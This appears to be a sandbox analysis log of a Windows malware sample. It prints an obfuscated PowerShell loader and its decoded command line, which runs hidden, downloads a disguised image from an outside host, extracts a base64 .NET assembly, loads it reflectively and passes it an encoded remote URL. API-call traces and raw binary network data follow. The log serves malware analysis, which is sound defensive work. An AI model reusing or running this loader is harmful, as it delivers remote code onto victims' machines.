€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2460
thread_handle: 0x000000000000033c
process_identifier: 2452
current_directory: C:\Users\test22\Desktop
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmlpaWlpaWlpaWlpaWtvbGRpb3JkLzQ3MS43My40NTIuNTgxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000000000000370
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff90000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We@¾´¹U–¦©QÃK—{‡øƒÑÈä° DOWNGRD fìeˆÈþ4ǞUZ±¯§vsÉã!ßðà îìÀÿ 
Data received }
Data received K
Data received GA¹Ö¶®¸~΁¸™e}.tÓÛg ‡¹¥ÀGòVë÷Ò^P6œ¿»2&܋!·ÐØ_Ëæ®sHâ+B­ †6¿"M1a¸À©êúH \`Ï)Sˆ›ÍÔ×¾m;‚•}¸g.¬îRUB¡æD(ÿßǛψÿ˜’n^-#JXˆcÙYú·.±¬jmn°°J5*¦=vá„>nçî¤Ä…‰è»L%“0ðypžyXôäïÇZyŽ`‡¨Å£s®Í)0Z‘ÝŠü*?[Sº)Íjeêí¾ó>ºµ0ÑTË5âÝbCýWhÔ½µƒMÕ<à8™]ké΁}¢l«†¡¯C>Hž„:UGɾŽ0”üU?Ôܼú¢BƟòñ!(û«¡¿Üeg¤#’â‡t{0“Žh’;~ðDI·  F§"Ä
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received dÿç°O³þhμž×~ü¡ÍÍÑïèß[ՊS#ÜZÊÚs®&,”Nã9¼YŸÞr
Data received p
Data received Ç~àHÀ,5µ¼Å3Ə̽ù²0ô¼“l`]2^èÒ.D˜7uõO%¤ªÒcTt¦*¦}ÜÞnì*.°KìÂ=ñP4ǎG€exîËӞoßls¦¤Rº·Ó'þWë;/@h‚*DZðYh¢Û:÷“ÏN9“{Ìâåp€HaÚ@Së=q¹;@ñCê‹^¹ž'VGڍ¼xãﶫ‡9xŽ{Ç=KL…boû©¤Uô¤ñÄWoÕÎL‹oaîødÜ´¶x¿ô~ôÄI‚1¬ª.ÅüüU8†vtç M÷_;h¹zj]„æ%9‹³nƒûÊê}¸Å\•W@!AÄٓÁ¢˜Ð„åz\%ggEŠ¹çÀN{&»2lüÇaÙp [—ÿ?®×f«I8X¢D¼¨Û1^7jÃ&23ØIôZÅ ½û©Û[i¬fÇáÀðl7èK^°í̌m3¥ç6!¥l¶»)¤òbÞuüìÚòSB¼¨g£–Á¼™áÃKKÇϺÕ{Ðê¤Í{ r4¥] ž©7P."-ÄT¢<É›(9k5if×óôøûç{Åô%{¶£IJt„ë.r)8yêGãdʇúà9»ð3=ÍùY’ÚhÅïZ‘é°Ê¸æJ´¶ë~5SŽ·}Fp JÑoE̅jÍÉP3=‡/wØ«ÂhQ²/@¬y •Ožº}©ŽQs†ïåŽB*œl£¿SFUÝ zñ8v¦‚”_ȁ…™–íó»’tÏü†KLCÀf ćwn‘nÈ[‹K; ÷(7[GâQH™a²PX[aY=È.„(kŠÕ(½T3:OG$K·¸FYýje¨*ï†`ÏÌQZQÁÄ–?ÅO¹¯D‡“±— v쵘ÐY¥N5Iø&Æ_cQa¦˜x·•ÚŠ"GÙ}Ž½“OŽ|ãzC&ˆøŒ£ƒ{ŒˆYô³#| љsJ–r{ ‹ÙyN{†ë……ZýË/ãl‘×û§ð-4M¹ÂžGIþ¿$—BDŠ“¯Ö2W¼2z[˯·é ŸÏ±d½x¤ïs,Ù^òs›W|]Kªu ’Eýøáá¶ð ƒºR"‰gä©yV ”¬ÓáIðâ»Þ~(ê~ÀÓôñÛ{d‹0  )6Œq΅µÀïËÖðÎÙÏÕ˓©t%z#žˆ9 B¦pOr¯#%–UÐ.¢cRãӘØU™êfÍû7©î£;Ø9O2»NúB'Ðl°þ4š C—v°w1 <8c—þ5ð÷ð`0Ó¢f JÞæ”À³Ûˆ¿’Žÿà svqÚFô4G£ˆ.L4NB˜óã·¹âGé:á•$ÞáU(´—¦MCñíQú³ I\“íŽ"W I´¹\"JÏ*ëD/üÎÞÞ\e·âî)âOïÃiOïö‡Â»ã>Ç,žx6\¿6ÑE5Ô|ýÖ_ie¯¹×9ùª”¥|mäyMR—gJ©;~=oPÝb‡”cr¨5ÐÄe²•“ŒBÆP³Í_ëiàIæ*úþºƒ6>M´ß–ïãÿkºyþ§B’å¶ÄÄU$‹-ä8f-ëqہó],0¿‘.…çü$“¶*"ZçÇڇúqø4ƦžA÷\DÇ­ëEÑN$,Œó-åçÙGb¬²ÞM,—oa\’2 g’“&[éà= È¦A®,'џø®åÅ̷ٟNñl²²…Oo‰ú¸«ï¦ëÙ®-JNeà­Õ†nÙ]Çܸzä‹@C(ÊØЭ—®i=µ@RÌ”w6¢{­73·q±Tç;ñ
Data received ΍Nÿ!LÄÃ>…2Ì£î`~Ílåhmñ|7Út§ÍV;*$+@’7-Ö/2bžzµK9A…¨uüõqbV¶ÕP¤þŽa™ŒrØfÒת-šÅ/Ø6L´qÑÅ8ά~-r\*j][Hå0Çp8Ÿï¯éo­>ƒÝàŠx÷¯­®nۑØä?'ؑ—$¬'u`ÈluJÒiV;1Òó»2´h™›nπ©Ïp”†Ká²k,‰Úî kàÙ[&“R¯›PÆàå(b}YõÛÊ-¼ÀéA]D7y¹1P¯/ëÎÉñ™–0e÷6îX£ãE¬ìÝÐÝ 7M§L丆ÞÊ^ ›x #í²Ôë>+È8Ê'Ã@¢AÓY&LM%¼!]?½6ƒ;÷A~©NèKÿG1ÑÒÊj`'Žk­¹äaúœ,ÌÇþ‡°Ù˜fæ¢lÊÓ·ò.@\œP{^y)(´WµÙŽ¾otÉ/—EµX§_Ä~GŒeNœìA^œ3Bÿ3¦Õҋ[ÌЛ†ÀB>#Í Ï‹y8`Ѝ˜ˆ2¹·úàƏ-)Üd[Îêá*Ýsy$ÖPbÚ×ۖÌ{‡¨§õè@4 I¾_ž›V3-©Û /„$·³šˆ0¿iáyRzÙrk7‰GL™v »ÉJ)ºû<ó ÁŸ Y«".+Ç¿cµgb „…®^£.o;Š wþ ¬L/W®‚'߂ÇÃMÿÖ£iÕôå{,k÷ì÷,ςô‡phÝÓOgœ¹‡fív92/a6w·<øÂ5€R<²9‘4çq:ÛOHJ!²Ä¤=x«7ÿò$gdN:(†ÛÜà<XsâÂößïæ¦\ôKLg˜5äʤ,ª­®Äu©uXuîÏÑÅÛ͹Vê—ÂãáeBƒãPX©BŠ/ŒMn•)úHkéü7(…%ИÄëØ…¡`’é5xå#ßa#V±UæqX#ùÂÀ7x¿Ú HæC(üå1«;Œ¦‚ ÅÒRۆtx¶-[vS–?=·ø» ¢hÊ3¶ȂߋµäƒÃål¡Nà3<ßo°UlB¬®äüe&­Âpeac:šblgzx¿fWƒ¢xÕ<ìÔz[Çس6€ à!s%é*<1Û-ù” "3äfQY‘ƒ 4,[郏¿u)3ßï=“*Ev1À!>ωÊë²x´dï^‰¼ƒú+ƒV”ª±éÕjè÷•zäɳc ²Lµ#/iKmcí¼ªÙ§ãƒäÅ9¡VCx&“×Û]3ðŽ¢¢œ—ÁTy„É™DªVÖ$ž`D~bÍÀK‚ñ«ÜZnB´„þ„OIþ¢ÿ?êuà¶IkB÷3À’Wã6Öï+b*¼Ý5Þrl‘.¶»Ÿd•'75~–È´¡øQaé Òò¥) <-¢ïj` Lì"æ9ü¼ò?8\„µ-x»›²àìGbW)s‰iJ@c/·±ÁçºJãSI{õÜÿÒ³Ì"H¢ æé#Ã˲›Ua•RޔHÞeyzZAÔJåg£P_gvÄß!X,`çÈzÈӛ-iPL‘ v±~=9v23ÏÕ3|rŸô&ºÑ>Ώ¤æ0Ú´–â>CE/ÁVfäÛ¯=°[£“¸˜³« ë+TLk1À"˜ò¾ñL¬7½“×þ§JРœ†… ýFÍðP(äýO %‰™%Ó_«/ì‘(À1èˆp!ëÊU¾1C)XõkžE…½ p"ɂ:‘}%Â#9³ûœsûÛÞw}7`ya–ô¥ó'÷lyÌf"u}±,´ü'}‘»ù°i`äœWà »ÒL &û
Data received 9³ìi‘ '¯"D.:+;îS"Ô¬×9وA_Cƒ2ß Š·m@\…ÉI2+‡1,úZøZcœØá&¥/”ì$tB ]Äüí0”﹓Êoê ֍H‡6iðfˆeΟpeÙTvm<æÇZjï¬ p®=šÚ¥kKÉ­ßM¨u͋3€ÊŽð”«RÀe€¾ƹ½Ýy¯:XJ xPãNj§­"qœ…w¯×Xª6¼ƒÔþ­˜Yu‰ªÐqaà¼J@@ûý2¬íäɒ¢×ÍÃrFBçRdq º†Øƒ8Ni˜«÷ù D16e‹˜^¨<[ŽÃ¤Ýß8—·•‡w²Éœ¦qÂÎÿò¡œÙ'*ÛÐñ]ë·ñœlž»ãÖo+Úñ¾±wtºÑ,/ @&Œö–øŸÛ÷Ïü»ª´ƒ%£ÚÓWÉXy>—ÿ·8é[{`ö^àC9ÛÒ ªfWÈNLè;ðÉôܬ'æšQ9 «ÎGÆ­‘h0øŽ|oþSñ;¤N@ »,ñâŠFn RxR´³O!¸jå*U"`ÄI³¾ãp¶šE2TÞ䪹=Kvm[Ä(Cù5¾¨ß|ã /‰K/Ôxoò²pFÜ?(à È?óÊ  ù/ÃÌ ŠL¼?Ã~ÀòÙµaï£ÙpL²V›Z6xàZêÕ ›ñì¹Nò‰Û¨p+NaWü¹+ °N’þ½?­Ïq¼Xb_Bè8Mº Ö{Bí)¦úsØOï-"#ýgž9<AÒ{±¹;žÚ•–wËc…„ÄϨnif *$vút¡¹Ø؇÷x̪ mâ¡]”«ôuf¨EDøg’d8lci¨Ÿ=o$|ZŒ ë_sÃÄ/€Ãéüˆ¡¶Åӊ«‚ ¢3ø%y6¼«?°knǤwO-Ÿ¡=á°åÅòՔˆ‰Í—ÒZø‹Qìm‡äæR'ñ–æQ)DyÚZ³µ7üÐôb8,ü€†Áƒ­Ev®Ó ”oéåNU ·o‹¯M¤Æ®–DH¼aŒ¬_šiA]܉ah”¢ŠNˆœÎgõ 29‰·;ÊæÐóBÞ¹…A¢"ë†æɲz¬Å€™ØÎlƒ¡·y¬ç¤?(±Ucð Äن۲ª8ùöNÑ'îã#V¾géÉ Ñ'Rê™!Ýf/-Œò¯l\|ùÜ_ûŽ ¶»Ff¬ÂG¾·ÓWފ ʜÁj5u_˜„{®¯û ¦À|‰6Pkh†›xEji‚={+!ˆØyÞsïԉn™û¤|]ÙßY¾èe»Ì|yM†æ¤Swy±(-p¯“kÊÃÅxzõãFs´3y*L E·„ow’ ½ 0IŒ•¤g“&+Y¥˜õS”›³É’ ·…¢ß0ƒ8CR(‹ªj(Ø:Iª!ÝZ5ɶr ® W5ÆÂZI_˜ÁxbñIeç"óòíK½D2;sÓ¸À µÈê_…ÎRµ:§ÿûwVîp¡ÖdĬu¼G¸9æýx œ;r%¤’[Ÿ¸óÒv±TÙ&8s2w´jÓlBÂE€Fs>Ô]ïÖÍëכ@mÿ°-#¾¬¨}O!ÕTp‡÷¶k¶/Müµ¸ž üJ«•[ÝC|B9>â äáCÕ%<Bç¤cÛª§ÿØWžÆpÙ¾G¶‚°3‚åÁ{ï'6d±bô˜ÊØù¾%H­T%š`ŸôD‡¯ú[æ âŠ4›DyNß o5Ýݜùý•àÕUÕ£¢€GÜâj¤jÏ«ý³7ÖDÐ~½5ä…ó ©°åQlU1$íí¤a ÊòÝÔ ôòÅUÜý _8¾ð¾EQ((ü®ZØPžü=˦¯SD
Data received ”,pWmʑøxôN»9PÚóvü( Ñm7j«zgæÖ¶L׉d NýS…³@TŸ‹›L‚û5çk^É1ÙÊft6-±ìL&—[9®»nH/®Ó]bd›<ºˆ+¢­Ÿc3C8åbӅ,ºŽ˛"EWþž„eTÉÕÆÄæ«¡6~㍪3“µ£²H0 ,{âH*ç3 gߘÉÛ?ËŽ;q†° ø°âdsXÖÊèÙ6¢ÅÝæ“Rý2[‡ÛZ&‘éÂD?Œµé[ø–ãCFúèÐs'Ÿað÷©±×àÉTOa6‚½>”©#qMþ›º ³y¼è¬üPBm€÷4û)Ïö³†ðæm*‰©*ädŽ*ږ³P9Ú Ágœ^¤DMÌFnC¬nýHeÃ(:ŽÉ1Yðåµ»T#ïV3sš ³O«Cº+C©¬—º…1t÷o2P¹‡L›röÚ³T!°NÆ$LxŽ(¬ñ­çö”€ÕSÑÃÎ~øÃ:2Ç pCî (¿ÁÖXåó£Ã6CK^vãhnZ‰eSa³õälLBãŠ@ªk šÈí‹/òr›c¡§¦ CÂôFê—°“P_öå%ȃ0G¯Õ …6ÀèØ?Ê ¸{°hLèÌÅ{?A¦ôZÊÆÆ#1NÞ¹Œ_^)ʨyTŠÏ=Æ@²¢N͍0S•Ú"9¿©¡(ð…ø6[ls*+j³(qæ ¿äl¹>…ñFz3ŸØðwü|º€¦SìïUŒõ|º6u i|̂L‹üñw† >CyUO(²>xÊ+¬œp½å·ª*‹Ë…ûÔ5Q&$-ê]ð‹¿ –FCçÐ7‘0F«à²Î/ éÝI3y[¯ï×3Lc?˜n¦‚Ѭ}ÅítZ þÎ%.¦vö×^ß­Õp[ÿÅ®¯€v‡]wE7¨ôF:몤òèY¬þn›ƒÄܑ¡!ä)[b¶Ï4kàhyêÅz6éҜ- ËÖ}T[ì:Ë·b—ƒì?™ [3Ý8ZH¢,™ãŒ4­é›·„½Q€HKÜöB—¿¯À$ŽR‘Ä?üºYJpîFW`–×ÞϾ3IæöЍÀ„€5Õ¸É ¹)­°iføì‡l3ĶoR‹`E7*°ÅThWi¦GT‡]_Ï=‚Âü;£Kþ'Ð¥_¤'OÿY—,úÜî‡Ñ¾Gzv‘¯-Ì]¹m"B ú-š`ÇÔäЮÓQ²Ür®±±nò“Éʪ1–Õu¶YÔ1ÛZâÿ#t(xŽª}kjb‹£Ò>q¹SJ”ßþ*€aíÍ*(k桌väøsï¡!ö,ŒçÄfŸC–›É“Ñ*ýÓ¿«œà´žµC&?Ç«*æE֔ä²2ןY× ‘…ýœžj’¶©¿Çš ; ó<¢h®/AÉÔ§µ³‘ÛÓÂß,Ùð’»õüǚ4Ï#t¹óyû#à¼:Ï«ŽÂç=QŸ;U ©GÀ$óÌ_ êæ ßÞI+8ž2EE‰Ûy2~t®]Rñ>éÞ 8­ä#t€éD(#x«¿šÏõóˆ¬ñ­àâUÛ3|¯æG wöáJȈݭ³èiâf™ÙWLo‰¦"ÙúÙ Öc¨3 õQ¾¶ádSÜóL—dí›o1æf¬þòSԅ•z:•Ñ)ƒù™3Þ»bǨ-¶¶›„ø2‹–ÌXCßJ]äl22¦qŸ´§ý«‹Ç‹J³Oz(͖{‘NDx™Ú‚§ÁNø!ΨÞÉúžXûݐE•Óû_ÄÝOAcÚp¡sÞ!ñiáWæ›ÞÏ
Data received [×5´SÌWÿI†É Ø:Ò<2VÏ2sYðQù ëŒt0ÛÆ{Ϭ ì2“|·óx”ª ´Ãàíæ¤=´W2Qâ[t†G姶tJ½gëÝBXh!áÂ?×¼>’r¬ñ†Vñ«6Ù¢Œ3Þ^©‘Úš ¹ødYtõõ!ºßiòVЃÌ<˜­Ãïú¿¾;Õ¸üîÛ¹fØãTa\ÚE°¨ò}üf|¿À҇ñÈÙù¢™W\Ÿ ×çý@Æ *…Z¹ê*ì(ÙAC¨¹Öt¥ÃX"–ãäΦ˜Á6á2T]u–7OÎ6ï®\¾GGµhÎs@ã5?ó.„ Õ0Ã6jË}¼ß®ÉAwÀCëVìÛ<sˆÈiÙnÉ»u»~JS&e^âˆ.RvÇ5SSƒ*ñ6 V´3Ârç^K|IÑú‰Ž÷fKЬq·…”Ðyúçښ`5ø©Ýõx*KRs I€Ó§6ô$Udä2º0É(øô?6ÿݧc üús1þ©µWÜsBÕÿ\ë´)‚–ûíé±Ð3ê€iš ¼‘jBÁ­ÊxºWèö{%!сçÈÍ%c‘cJEÝ~—fÒØá–_Ã{ÚÞ) òÕ(Ú®Þ4¦Šï—ê¿™sØÑ7;¾.I«ø·6¢´Yüù{k¤Y’V£¡ÇŞk’ÒÕ„­Mr®OÈ1³± k©õçw‹€ú»‘Í aújÐw„K×OŠGÒzlÐ$E™]žÏ'B¾#6ö”+âñm"ðÏpŽ´e¯W*£ê! ´†પŽ)iŸr=«¼4jææÑo㪠áN(}gÎEzš˜ùh}s"–ïUðRš@¯°wÙhÀ¼q@]~†KBý“õ|1ˆØcÈÄÆtYB"ûÍÿVPUç«Ä¦kց;ßcç΢>Y³öñ =ٙÈNad6O3BqRB÷›,o÷±€P…ünBþñ®ó(¡ÊIû¤ *Ë¡ZÔN™UÎ;KžÈõ䇋_wâ£m1M66J.W´4vù)€/” sƒ©í–œ²€ÔZjh_ÕÒ¦‰ócÁ ÑKF]ÄT¹6±1ø汯ÍÕÌE¥”_Ó,«ˆ¦‚‹*°?›â|½Õè/}9¯—=T!ÆÄN{YýlŠ¡î&|à ;„Û÷ü¶!²²[¢Õ4¨£¢_¢•pž8¦®'fÛ3ʐ©«`zLá#/°ë­_Ì·=Æðpþ‹œ"¿‘öc=º[ó À¹øþÿ§{VfªQ;‘Ôc! gÙü‚'¸qßöjÑ"&ΧžÑ–7Û~ŒôǛ wHøìú†7÷—Ão “+ë9 T©¤åûOYÛ#ÁþH:ÄyöÜßÙ"dm,•ÍF&3­ž/N熰×5Êó´Õz]ªw¢#‚¿ªà€r(÷`Ò¥Ä=Ë&àJ­Eâä„.†s¥ D˜KšüðÛºyªt6úŸÂ'ð-qCïªDçMªæØZO,û»FHÄ]tã¡mŽé_;Ýo¤ÿÒ3ÃþCH0ôø/lhÚ4Ë)LôçIã.Ì~‘”•¤¤ÅAWå¬ré2Ì ÑÚ&í˜ÝÚû7ßÓßWìØ"ReœÈ£×æ9·bí÷ úIü ò¦eºû=%vþ[_2Œ‹ÜauÍ(TŽ­§[-4Äá–r$*½8k܇tZŠVÎ)‰«í]ìŽõ-F`ü1ñ$uÄLü¢GY>DФçãÈ,ÖâChS:1MÂÈ%æÍß[Äù`ìe½]·iM£õëPjSÈe¥¶&5ëw[0Ú6à6
Data received Dl/‡L•¯¢Ü^ö*æ)á[fh|Ãþ˜„ ´–ò§“eÄ:iwOœjVIʸ²å!å}²>ý~®Õ§Ã/›ÂÈ#!¡ÙX}Ñ)31ðIe$Š\֒/Í£eSV%Cæy]ønë£Z÷jôÓ¶Ù)(vÜï Ø.ëi2q¸KFëž8exÙàkÒÿWæb+ $mã¯X¯;a²åûŠÿïœ=ÏìÝŠ—TømW[á¢[A*ˆÊ̬è@sçta©ó”C™R$å?KÉ¡+ËG—¸ìó¤ó»ôµ °'´Ñ_Å8&̞ (%ÑMŽ˜ßûiFÎØ£M2û3m8Õ«ø€/FgÙ´.ƒ°+1eŒ™HçŠ3¯í0$ “…Jڎèí‰N.80îí¤‡ÖnWtX!VwœÆ¸¹y;ÿ/—ê¾tYÍ ™8“’ûg•S•3%x׬9څžNjL-²Eö.-¿AöìÝé+QøóØ2]òtl‡ Z\™è!S”ڍä¶éæV´j%g_ö†€\`ÒÖá÷¹ß·IÛ£þ,ÏvC?› ÖÑπÂ00ud{àÕ¹­°ÿYœ«úFý×ƼMŠ²ˆØñúYtØs ˳v¦÷öï\ÎÍáç‚ÃhâbDĖ ®ªÇÒÆÝâ“'‡Ð'¦M–ÖåÍsõÎJ$#)Ͻ»€Àõ"Ç„/5 d8å+ÆÍÍΚûNÚB/84à´[©w#§¯Ï±N ÂËëž,Á&ûæá‘S¡+ÍpD#¹FkšÌ^• fât_i’põÁ Ðìä9¡¡?ZsP/i~—×À*®ÑUٞäë8õíI;ÀÓ{Ç):Jh6?ZX—ÕÕÏ~ \u<C9²ÃÞî—×…‰"l/‹E4žx-ûO]SÛ.«E Qâ«UeùpÚ>“¤ÂícŸ?³H0z6®»Í¬7é§Á,ÌÄw¾FËÛ)å·ÁbT@¨ë¹“ AP»îcº×µ>O–‘WX­pÏyb~“›3T¨‹Â{½6úA£d²– ñÎÍå°é‹¶+mb¬ŽUŠ¼Û„Ÿmþ„áELØåò#R¤wää`¡4*+9âÆô{*gzíR0ZœFîfó ¶Ï:‹æ´Ç¬;‹*†Ý/ò¼,,ù¥Ý±®ŒótCHÉanŠµç@ÿgÙÈqÈéuÂJoM“H4ZØ |ïGf|  əŒÕÎD,„5¡mF„а¯2,¿uèm —dÛ¤Þ΋î–ÌX|‹žBŒóþ_…þè±CÜó+УV»6/CÿJvóiÜç,åo1nðMuŒªù ©TBž}¢zÊ*¤iæ-0 mÞWÚïû/wómñÖ6|YV}k#l± (µvñ¼yS;£µ¥Ëßù™l](A&Ôý ·5êè¢1­ÍôÄKûæş­1Y<,LJë S!SÀ¹a:ÄT!5Pžºœ÷ôª¶†¢ºқ% áÓm;[OÏ*‘~>1ª\svœ™˜Ø7=Sx3}ey ?D5ÍaEÞä«s.Íâ}.ۏŠ( Üh¶ÏŸøØ#YÌÔ|9µ<Ô¦ð_L&iCþ ‰ð:»æ¡ê¼MwVâ~çs°þÁ›„‹ "Vb¿¯¹·¯—øZîÌ97V¦ë¬é#>Í+ñö‡:½¦í*]µàh‚ëNÀGppeݑ_«ìÆyPàG·Qßîžlp¾åY3MFCrºÈšWäò±œÙFõNeTð=¿«Ö§Ú*9Êo³)³ÁjÔ¨‡ž}‰Å/ó¸m+–¼
Data received x˜‹"A…çÞޖ1R EŽê¯v^'çš[;̊7Ó]^uB!s¿Ùe ¿7.NÛE2ð xüh/|Y¡aã¼G0e0ù#yÀøÜüt*ætJdÖ¦’?¬ééùË>³³JÝ¥[=è\O‡4Bí¨Ïz.©qxDý?9¾…ã, ϵ÷ F[H-Y²ø>·îá½¼ˆak¾’«Ð*‰ÛÄbâÚŸÖÜ¢…:µK’ÂÕ ‰\~©ÇlÜÔEýKo ÉðÊ% xéÔa‰ B晅†Äae¡â‹_;•î2]q8pÿhñ¥%$âÝ#ǐXÇzañ”fŒâ¼Í0¯9!¼Çÿ+òTrâ²&=»K%46Ï)«Î3íòó¯.¾ßåÉN ݀)—ÚÔQe/Þ#c»áðŸV•Çº<RÃ¥ÿ™ L^ðÂe²ë(j£Ç°Úpo&torÇp~Ðq.>ÜfxU}ùÖRCI?{TöB[–ƒy„ÃvíR¶#|´ä5.K @ë§Ûˆ ßVÔîyôš_™BÉ£×tI ƒÍäüUhe§às‡OÜ'û€ ×µ½§â^³ÕßG·nÞóJlaFaE3M¹›nðq=ÿq‹õAjT¬à0ßvNj`ß0¯LZÞ©Ð(ґ–ØÈäø… ¸R^"’Ix¤[O}ì…:¢I~ê+D¼»©õ1ï!D¥®ÿ‹¼ ×Ö^þ‹<Ào2òz«* e~Lâz…„8Wé[^A< ¢ χJŽî5]1¨Õ].G\V° ˆ6(¤êç¾:´P, "‹»35ðΗ7bÑèÀ+¹ïi‚±‹@hmÉ£,¼ñ¿fîÝ[‰fàôÁ”Je(–™ª”5ٗ„½Í—ìÑ3 GøŠ¬k1Ìo"ˆQðÐ}Ê ®DìÑKP4 Ix¬+zì‡øÝ h+åÍpw4­#AB-SJú¦kÚ˜Gù-hÎc)ZƒBíÉý$üõDÒw:õÙݑÁúÔL‰b”Trá@4Ýé(ý²|U}Šy‚ð¢Äî_ßß ï€Àa>ð9ùÒßÔ0æ—J 0Y½QkíK6¹êsêÎÇ?üÇiU+lů7á7’‡Ù&7џ p¨çÞ=XÔ;ø'ÅöˆT#&WêØ8QýçS–æì4¡éIئe꧂G¶åÝa ·tÔ¦R  ÃO>ö·c˜ü’u–±±à"oРîŠ÷®Êòš—'ëÁ®0~‚’f^ÁïÈfïå:@iSPPÛÐê®é?K^´.X‹ÖƒÄJoZ?Ñ77Š[ žÇÓe%œLkúüu[Tâ)½Ö'8DBouj€Ý×5­2QFÀ¾éKÐHȗ–Õã“×i.{<ý€t‹ ïÏlÀ :À½l¯~±I’(‚*šr*¡ 